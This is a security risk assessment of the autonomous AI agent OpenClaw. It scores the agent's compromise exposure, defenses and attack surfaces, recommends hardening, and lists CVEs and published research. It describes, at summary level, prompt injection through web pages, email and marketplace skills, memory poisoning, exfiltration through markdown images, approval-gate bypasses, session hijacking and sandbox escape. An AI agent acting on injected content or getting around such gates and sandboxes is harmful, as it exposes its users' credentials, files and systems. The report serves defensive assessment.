1 Risk Scores

Five headline metrics from the AIRQ methodology. The first two place the agent on the quadrant; the remaining three describe how much defense is actually in place.

Compromise Score: 9.2 / 10

Ability to Inflict Real Harm: 10.0 / 10

Total Defense Score: 0 / 15

Verified Defense (Isolation + Action Controls + Monitoring): 0 / 9

Security-Adjusted Capability (SAC): 3.52

Compromise Score: 9.2 / 10. Among the easiest agents in the set to compromise. Multiple well-documented attack paths, confirmed zero-click vectors, and several published CVEs.

Ability to Inflict Real Harm: 10 / 10. Maximum. Shell, network, credentials, file system, and autonomous action are all available, and nothing meaningfully contains the blast radius.

Total Defense Score: 0 / 15. No defensive controls across any of the five defense categories.

Verified Defense: 0 / 9. All three high-confidence defense categories are absent — a confirmed architectural state, not a research gap.

Security-Adjusted Capability: 3.52. OpenClaw's wide capability footprint cannot offset zero defense and very high compromise exposure, placing it near the bottom of the ranking.

2 Defense Components

Five MECE categories (Input → Processing → Action → Output → Detection) each scored 0–3. OpenClaw scores zero across all five.

[Scorecard: Input Guardrails, Execution Isolation, Action Controls, Output Guardrails, Monitoring & Audit; no score shown for any category.]

Input Guardrails: 0 / 3. Nothing filters untrusted content before it reaches the agent. Any webpage, email, chat message, or marketplace skill can deliver prompt injection straight into the reasoning loop.

Execution Isolation: 0 / 3. The agent runs in-process with user-level privileges, unrestricted network, and full file system access. No sandbox, container, or network allowlist is enabled by default.

Action Controls: 0 / 3. Tool calls execute without approval gates or a permission model. The agent can send, publish, deploy, or purchase on the user's behalf with no interruption point.

Output Guardrails: 0 / 3. Outputs flow through markdown, image, and URL rendering unchecked, leaving every documented exfiltration channel open.

Monitoring & Audit: 0 / 3. No structured logging, no audit trail, and no compliance certification. Incidents are effectively invisible until they produce visible second-order damage.
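
The two headline defense totals can be reproduced from the five component scores. The sketch below assumes both totals are plain sums, which is consistent with the stated maxima (5 × 3 = 15 and 3 × 3 = 9) but is not spelled out in the methodology text; the names are illustrative.

```python
# Component scores as reported above (each on a 0-3 scale).
DEFENSE_SCORES = {
    "Input Guardrails": 0,
    "Execution Isolation": 0,
    "Action Controls": 0,
    "Output Guardrails": 0,
    "Monitoring & Audit": 0,
}

# The three categories counted toward Verified Defense.
VERIFIED = ("Execution Isolation", "Action Controls", "Monitoring & Audit")
MAX_PER_CATEGORY = 3


def total_defense(scores):
    """Return (score, maximum) over all categories, assuming a plain sum."""
    return sum(scores.values()), MAX_PER_CATEGORY * len(scores)


def verified_defense(scores):
    """Return (score, maximum) over the three verified categories only."""
    score = sum(scores[name] for name in VERIFIED)
    return score, MAX_PER_CATEGORY * len(VERIFIED)
```

With the scores above, `total_defense(DEFENSE_SCORES)` gives `(0, 15)` and `verified_defense(DEFENSE_SCORES)` gives `(0, 9)`.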

3 Attack Surface Exposure

Ten surfaces scored 0–4 each. Eight of ten score 3 or higher; seven are at the maximum of 4.

[Chart: Attack Surface Scores for User Input, External Data, Memory, Reasoning, Planning, Tool Execution, Orchestration, Inter-Agent, Output Processing, and Configuration.]

User Input: 4 / 4. Direct prompt injection is trivially effective: there is no input validation and no separation between the user's intent and adversarial content.

External Data: 4 / 4. Ingests content from web pages, email, 20+ messaging platforms, local files, and the skills marketplace. Every channel is an attacker-controlled input path.

Memory: 4 / 4. Persistent cross-session memory with no integrity verification. One successful poisoning persists into every future conversation.

Reasoning: 2 / 4. Moderate exposure. Goal manipulation is a theoretical risk, but adversaries rarely need to attack the reasoning layer when the input channel itself is open.

Planning: 2 / 4. Task decomposition is exploitable, but damaging outcomes arrive through tool execution before planning subtleties matter.

Tool Execution: 4 / 4. Full shell, code execution, API calls, and credential access within scope. The surface that converts any compromise into concrete harm.

Orchestration: 4 / 4. Autonomous multi-step chains with no interruption points — compromise at any step propagates unimpeded.

Inter-Agent: 3 / 4. Weak trust model between cooperating agents creates meaningful cascade risk, though it is not the lead attack vector today.

Output Processing: 4 / 4. Markdown, image URLs, and unsanitized redirects give attackers several exfiltration channels for sensitive context.

Configuration: 4 / 4. The plugin and skills supply chain is the most mature attack path — 820+ malicious skills have already been documented in the marketplace.
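
As a quick arithmetic check, the ten per-surface scores listed above can be tallied directly. The sketch uses only those scores and the 0–4 scale; the function and variable names are illustrative.

```python
# Per-surface scores as listed above (each on a 0-4 scale).
SURFACE_SCORES = {
    "User Input": 4,
    "External Data": 4,
    "Memory": 4,
    "Reasoning": 2,
    "Planning": 2,
    "Tool Execution": 4,
    "Orchestration": 4,
    "Inter-Agent": 3,
    "Output Processing": 4,
    "Configuration": 4,
}
MAX_SCORE = 4


def tally(scores, high_threshold=3):
    """Count surfaces at the maximum and at or above the 'high' threshold."""
    at_max = sum(1 for s in scores.values() if s == MAX_SCORE)
    high = sum(1 for s in scores.values() if s >= high_threshold)
    return {
        "at_max": at_max,
        "high": high,
        "total": sum(scores.values()),
        "possible": MAX_SCORE * len(scores),
    }
```

For the scores above, `tally(SURFACE_SCORES)` reports seven surfaces at 4, eight at 3 or higher, and an aggregate of 35 out of a possible 40.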

4 Detailed Assessment

Agent properties mapped against best-in-class reference agents from the same cohort.

Dimension	OpenClaw	Best-in-class reference
Untrusted input surfaces	Web, email, files, 20+ messaging platforms, browser, shell, marketplace skills	Code-completion tools with no web or messaging ingress
Tool capabilities	Full shell, browser, file system, 20+ messaging platforms, email, 24/7 daemon, marketplace skills	Scoped tool access with explicit capability declarations
Human-in-the-loop	None; fully autonomous 24/7 daemon	Claude Code: 3-level permission model with deny accumulation
Sandboxing & isolation	None; 30K+ exposed instances; no network isolation; no file scoping; no credential management	Claude Code: Seatbelt + Bubblewrap + domain allowlist. Codex CLI: Landlock + network blocked.
Known CVEs & incidents	10+ CVEs; 820+ malicious marketplace skills; mass exploitation documented; zero-click vectors confirmed	Cohort agents with zero published CVEs and independent adversarial testing
Compliance posture	None	Ada AI (AIUC-1, SOC 2); Moveworks (FedRAMP); Augment Code (SOC 2, ISO 42001)

Key Risk

Fully exposed autonomous agent with zero controls; mass exploitation actively occurring.

Lethal Trifecta

Yes — all three

The Lethal Trifecta (Simon Willison) applies when an agent combines exposure to untrusted input, access to sensitive data, and the ability to communicate externally. OpenClaw meets all three conditions: it ingests untrusted content from web, email, and marketplace skills; it accesses user files, credentials, and messaging platforms; and it can send outbound traffic without restriction.
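
The trifecta test is a simple conjunction of three properties, which can be written down as a predicate. This is a minimal sketch; the `AgentProfile` type and its field names are hypothetical and exist only to illustrate the check.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class AgentProfile:
    """Hypothetical summary of the three trifecta properties for one agent."""
    untrusted_input: bool          # ingests content an attacker can control
    sensitive_data_access: bool    # can read files, credentials, messages
    external_communication: bool   # can send data out of the environment


def has_lethal_trifecta(profile):
    """True only when all three conditions hold at the same time."""
    return (
        profile.untrusted_input
        and profile.sensitive_data_access
        and profile.external_communication
    )


# OpenClaw as described above: all three conditions are met.
OPENCLAW = AgentProfile(True, True, True)
```

Removing any one of the three properties makes the predicate false, which is why the hardening steps in the next section target input, data access, and outbound traffic separately.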

5 Hardening Recommendations

If OpenClaw is deployed in an enterprise environment, these controls map to the five defense components. None restores the agent to an acceptable level of risk; they only reduce the blast radius.

Input (Input Guardrails)

Disable the skills marketplace entirely; allowlist only internally audited skills. This treats the 820+ documented malicious skills as the baseline threat model rather than an edge case.
Strip or quarantine HTML, markdown, and embedded content from any ingested email, chat message, or web page before it reaches the agent context.
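
The stripping step could look roughly like the sketch below, which reduces ingested content to plain text using only the Python standard library. It is an illustration under stated assumptions, not a complete defense: the function name `quarantine_text` is hypothetical, the markdown patterns cover only inline images and links, and plain-text prompt injection passes through untouched.

```python
import re
from html.parser import HTMLParser


class _TextExtractor(HTMLParser):
    """Collect visible text; drop tags, comments, and script/style bodies."""
    SKIP = {"script", "style"}

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.parts = []
        self._skip_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag in self.SKIP:
            self._skip_depth += 1

    def handle_endtag(self, tag):
        if tag in self.SKIP and self._skip_depth:
            self._skip_depth -= 1

    def handle_data(self, data):
        if not self._skip_depth:
            self.parts.append(data)


MD_IMAGE = re.compile(r"!\[[^\]]*\]\([^)]*\)")   # ![alt](url)
MD_LINK = re.compile(r"\[([^\]]*)\]\([^)]*\)")   # [text](url)


def quarantine_text(raw):
    """Return plain text with HTML markup and inline markdown links removed."""
    parser = _TextExtractor()
    parser.feed(raw)
    parser.close()
    text = "".join(parser.parts)
    text = MD_IMAGE.sub("", text)       # images are dropped entirely
    text = MD_LINK.sub(r"\1", text)     # links keep only their label
    return " ".join(text.split())       # normalize whitespace
```

HTML comments are discarded because the parser's default comment handler does nothing, so instructions hidden in comments never reach the output.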

Isolation (Execution Isolation)

Run OpenClaw inside a rootless container or Bubblewrap sandbox with network blocked by default and an explicit domain allowlist.
Scope file system access to a dedicated working directory; remove access to home directory, credential stores, and SSH keys.
Run under a dedicated OS user with no sudo rights and no access to user credentials, tokens, or browser profiles.
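
One way to express the sandbox recommendation is to build the Bubblewrap command line programmatically. The sketch below is an assumption-laden example: the agent command `openclaw run`, the `/work` mount point, and the merged-`/usr` host layout are all hypothetical, and the domain allowlist is not covered here because `bwrap` itself only offers network on or off.

```python
def bwrap_argv(workdir, agent_cmd):
    """Build a bwrap command that exposes only a read-only /usr and one
    writable working directory, with networking disabled."""
    return [
        "bwrap",
        "--unshare-all",            # new namespaces, including network (no --share-net)
        "--die-with-parent",        # kill the sandbox if the launcher exits
        "--new-session",            # detach from the controlling terminal
        "--ro-bind", "/usr", "/usr",
        "--symlink", "usr/bin", "/bin",
        "--symlink", "usr/lib", "/lib",
        "--proc", "/proc",
        "--dev", "/dev",
        "--tmpfs", "/tmp",
        "--bind", workdir, "/work",  # the only writable host path
        "--chdir", "/work",
        "--setenv", "HOME", "/work", # keep the agent away from the real home
        *agent_cmd,
    ]


# Hypothetical invocation; pass the list to subprocess.run on a host with bwrap.
ARGV = bwrap_argv("/srv/agent-work", ["openclaw", "run"])
```

Because no home directory, credential store, or SSH path is bound into the sandbox, those locations simply do not exist from the agent's point of view. Running the launcher itself under a dedicated unprivileged OS user covers the third recommendation.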

Action (Action Controls)

Introduce an approval-gate proxy for any tool call matching shell execution, file write outside the working directory, or outbound network to a non-allowlisted domain.
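
The matching logic for such a proxy might be sketched as follows. The `ToolCall` shape, the `/work` directory, and the allowlisted domain are hypothetical; a real deployment would need to map OpenClaw's actual tool-call format onto something like this.

```python
from dataclasses import dataclass
from pathlib import PurePosixPath
from urllib.parse import urlparse


@dataclass(frozen=True)
class ToolCall:
    kind: str     # "shell", "file_write", "http", or anything else
    target: str   # command line, absolute path, or URL


WORKDIR = PurePosixPath("/work")                       # assumed working directory
ALLOWED_DOMAINS = frozenset({"api.internal.example"})  # assumed allowlist


def needs_approval(call):
    """Return True when a human must approve the call before it runs."""
    if call.kind == "shell":
        return True
    if call.kind == "file_write":
        path = PurePosixPath(call.target)
        # Relative paths and ".." segments are treated as outside the workdir.
        if not path.is_absolute() or ".." in path.parts:
            return True
        return WORKDIR not in (path, *path.parents)
    if call.kind == "http":
        host = urlparse(call.target).hostname or ""
        return host not in ALLOWED_DOMAINS
    # Other call kinds are not covered by the recommendation above.
    return False
```

For example, `needs_approval(ToolCall("file_write", "/work/out.txt"))` is false, while a write to `/work/../etc/passwd` or a request to a non-allowlisted host is held for approval. A stricter variant would gate unknown call kinds by default.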

Output (Output Guardrails)

Disable markdown image rendering and URL auto-fetch in any interface consuming OpenClaw output. This closes the primary documented exfiltration channels.
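
Where the consuming interface cannot be reconfigured, a filter in front of it can approximate the same effect. The sketch below is illustrative only: `sanitize_output` and the allowlisted host are hypothetical, and the regular expressions handle inline markdown images and bare `http(s)` URLs, not every URL syntax a renderer might accept.

```python
import re
from urllib.parse import urlparse

ALLOWED_HOSTS = frozenset({"docs.internal.example"})  # assumed allowlist

MD_IMAGE = re.compile(r"!\[([^\]]*)\]\([^)]*\)")      # ![alt](url)
URL = re.compile(r"https?://[^\s)>\]]+")


def sanitize_output(text):
    """Replace markdown images and non-allowlisted URLs with inert markers."""
    # Images are never rendered, so their URLs cannot carry data out.
    text = MD_IMAGE.sub(lambda m: f"[image removed: {m.group(1)}]", text)

    def _check(match):
        host = urlparse(match.group(0)).hostname or ""
        return match.group(0) if host in ALLOWED_HOSTS else "[link removed]"

    return URL.sub(_check, text)
```

An image such as `![s](https://evil.example/p.png?d=SECRET)` becomes `[image removed: s]`, so the query string that would have carried the secret is never requested.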

Detection (Monitoring & Audit)

Log all tool calls, shell commands, and outbound network connections; alert on the known indicators of compromise from the 10+ published CVEs and the ClawHavoc malicious-skill set.
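
A structured audit record with indicator matching might be sketched as below. The indicator list is a placeholder: `sessions_spawn` is taken from the sandbox-escape research cited in the next section purely as an illustration, and real indicators would have to come from the advisories themselves. The logger name and record fields are likewise assumptions.

```python
import json
import logging
from datetime import datetime, timezone

audit_log = logging.getLogger("agent.audit")  # assumed logger name

# Placeholder indicators for illustration; not an authoritative IoC list.
INDICATORS = ("sessions_spawn",)


def record_event(kind, detail, indicators=INDICATORS):
    """Emit one JSON audit line; escalate to WARNING on an indicator hit."""
    hits = [ioc for ioc in indicators if ioc in detail]
    entry = {
        "ts": datetime.now(timezone.utc).isoformat(),
        "kind": kind,            # e.g. "tool_call", "shell", "network"
        "detail": detail,
        "indicator_hits": hits,
    }
    line = json.dumps(entry, sort_keys=True)
    if hits:
        audit_log.warning(line)
    else:
        audit_log.info(line)
    return entry
```

Emitting one JSON object per line keeps the log machine-readable, so the alerting rule can live in the log pipeline rather than in the agent process that an attacker may already control.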

Even with all of the above in place, OpenClaw's base architecture (persistent memory without integrity verification, unrestricted orchestration chains) keeps it in the upper half of the compromise-score range. For environments with sensitive data, the recommendation remains non-deployment.

6 Threat Intelligence

Published vulnerabilities, security research, and active exploitation evidence informing the compromise and defense scores above.

CVEs and Advisories

CVE-2026-25253 — ClawBleed RCE (CVSS 8.8). Remote code execution via crafted skill manifest. An attacker-controlled skill can execute arbitrary code on the host system during installation.
CVE-2026-32922 — Privilege Escalation (CVSS 9.9). Local escalation to root via daemon misconfiguration. The 24/7 daemon process runs with insufficient privilege separation, allowing a compromised agent to gain root access.
CVE-2026-29607 / CVE-2026-28460 — Approval Bypass. Tool-call approval checks are bypassed under specific plugin states. Agents can execute privileged actions without triggering the intended confirmation gates.
CVE-2026-26322 — Server-Side Request Forgery (CVSS 7.6). SSRF via browser-tool URL handling. The agent's browser module can be directed to make requests to internal network resources.
CVE-2026-34426 — Approval Bypass via Environment Variables. Approval gates are bypassed when specific environment variables are set, enabling silent execution of restricted tool calls.
jgamblin/OpenClawCVEs — community-maintained CVE tracker cataloguing 156 advisories to date.

Published Research

The Hacker News — OpenClaw bug enables one-click remote exploitation. Walkthrough of the zero-click attack chain from crafted webpage to full shell access.
Kaspersky — OpenClaw vulnerabilities exposed. Analysis of the agent's attack surface from an endpoint-security perspective.
CrowdStrike — What security teams need to know about the OpenClaw AI super-agent. Enterprise threat assessment and detection guidance.
Cisco — Personal AI agents like OpenClaw are a security nightmare. Network-level risks when autonomous agents operate on corporate infrastructure.
Snyk — ToxicSkills: malicious AI agent skills on ClawHub. Supply-chain analysis of 820+ malicious skills in the public marketplace.
Oasis Security — ClawJacked research on session hijacking. Demonstrates how an attacker can take over active agent sessions through crafted inter-agent messages.
Wiz / ARMO — Analysis of sandbox escape via sessions_spawn. Documents how the agent's session management API can be exploited to break out of any applied container isolation.
ClawHavoc — 341+ documented malicious skills in the public marketplace. The most comprehensive catalogue of supply-chain attacks targeting the OpenClaw ecosystem.